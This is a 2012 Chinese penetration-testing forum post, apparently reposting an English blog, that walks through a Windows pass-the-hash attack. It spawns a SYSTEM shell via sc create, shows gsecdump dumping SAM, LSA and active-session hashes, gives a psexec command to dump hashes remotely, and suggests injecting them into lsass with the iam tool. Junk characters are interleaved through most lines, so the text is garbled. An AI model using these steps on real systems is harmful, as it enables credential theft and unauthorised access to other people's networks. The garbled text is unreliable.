找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2322|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
0 A+ p- e0 W- s$ _, e# H, ]
( i- z. g) ~9 }+ `; iC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
  W4 c% W, d9 R* i5 A- ][SC] CreateService SUCCESS  g2 l; M( g* v; }0 G" S

0 v' j4 e; e) a" R) `C:\>sc start shellcmdline
: ~/ m3 X3 n6 G  B7 ?, S' ]+ ?[SC] StartService FAILED 1053:
& m- z- K, L+ z! o, }7 p3 o+ J' O( l* @
The service did not respond to the start or control request in a timely fashion.$ u" u' S; }& ?6 b& n. z# t
2 {! L, S( h0 M) Q
C:\>sc delete shellcmdline
' M0 V2 _4 B" I& q6 c[SC] DeleteService SUCCESS
+ m0 |) ]( }( A& u  ?6 `( w. p" M# T  t5 k7 R& X( H/ u
------------( R2 ?: @& {/ r" L3 F6 t
- r2 a" B0 h: u  w# e$ E. i# I: U
Then in the new DOS window:# G" U- F8 Q  `  i5 h4 s- c1 D

1 M: j4 I/ C2 l' Z! eMicrosoft Windows XP [Version 5.1.2600]
9 H) m. _( Y; H9 q( \(C) Copyright 1985-2001 Microsoft Corp.
8 D6 g; h! x/ T( w
) K8 n( v2 l" Y# m& x. l: {# kC:\WINDOWS\system32>whoami* M' G* }* {/ K! E3 N4 A
NT AUTHORITY\SYSTEM
2 t% W2 {9 S5 k6 F6 ], j  H" M8 x% f, ^3 i9 k( u
C:\WINDOWS\system32>gsecdump -h; A/ \6 _. ]6 D9 ^
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
: e6 L  P. Q) d' b0 qusage: gsecdump [options]
) K9 v: p. S$ L1 L8 q! J7 n* T; p1 U) a- |4 R  M& O/ a  w
options:& I7 J. Y+ R4 g6 H+ A0 K
-h [ --help ] show help
* p0 J" g# w6 Q# }6 J-a [ --dump_all ] dump all secrets
5 A: T8 J) k+ M4 z$ S1 M% F0 ]% a; [-l [ --dump_lsa ] dump lsa secrets, W. T! S" j# x; P. S: ~* B
-w [ --dump_wireless ] dump microsoft wireless connections
6 p9 [8 Z$ |9 h" i! }-u [ --dump_usedhashes ] dump hashes from active logon sessions
" V; J* Z  v0 H  r# e-s [ --dump_hashes ] dump hashes from SAM/AD. B. H$ _$ r3 @$ q

1 k. ?0 f# l. |; K. n% nAlthough I like to use:- ~9 C$ q2 [/ g7 E% d
: e8 ?; a& z6 s' i' u. `& ^4 M' O' n
PsExec v1.83 - Execute processes remotely; t! \/ `  r: y# H$ N' q' N
Copyright (C) 2001-2007 Mark Russinovich
, f0 r9 B& P: t) bSysinternals - 链接标记[url]www.sysinternals.com[/url]
3 d5 D' E' l: \3 n
" _5 w2 x3 ~0 f3 P& a* }* {C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
) N+ f/ e! d1 S, l& H
% ~  h7 P: W0 s9 H1 Z5 |" n9 t/ U4 l- y; ?to get the hashes from active logon sessions of a remote system.
0 V- X* y+ t0 @' f! s9 h2 _0 j. B6 f: r5 R1 g9 c) x
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.! e4 s+ W6 S: ~

7 r' C. l% z: P5 c  {4 x. Z5 Y提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
4 ?7 k) F" Y( F, N原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]) p6 {* b. g7 o

9 ^- ?/ z4 W& e我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
2 C0 o! ^% H1 C% L# X- c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表